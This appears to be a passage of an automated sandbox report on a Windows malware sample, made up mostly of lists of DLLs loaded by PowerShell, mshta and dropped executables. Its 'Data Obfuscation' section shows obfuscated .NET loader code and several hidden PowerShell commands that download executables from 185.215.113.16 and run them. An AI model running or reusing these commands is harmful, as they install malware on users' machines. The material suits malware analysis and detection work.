Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: DhqvS8pXj8.exe Static file information: File size 2142208 > 1048576
Source: DhqvS8pXj8.exe Static PE information: raw size of section fsnlaalu (0x19f200) exceeds 0x100000
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447686748.0000000000692000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: protobuf-net.pdb source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Unpacked PE file: 0.2.DhqvS8pXj8.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Unpacked PE file: 23.2.TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hrrnbomn:EW;cbgcjyrp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Unpacked PE file: 46.2.483d2fa8a0d53818306efeb32d3.exe.510000.0.unpack :EW;.rsrc:W;.idata :W; :EW;epptfshe:EW;zgobaftm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;epptfshe:EW;zgobaftm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Unpacked PE file: 64.2.TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE.dc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hrrnbomn:EW;cbgcjyrp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs .Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs .Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs .Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs .Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: k6Sly2p.exe.6.dr, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p.exe.6.dr, -.cs .Net Code: _0001 System.AppDomain.Load(byte[])
Source: k6Sly2p[1].exe.6.dr, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p[1].exe.6.dr, -.cs .Net Code: _0001 System.AppDomain.Load(byte[])
Source: k6Sly2p.exe0.6.dr, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p.exe0.6.dr, -.cs .Net Code: _0001 System.AppDomain.Load(byte[])
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
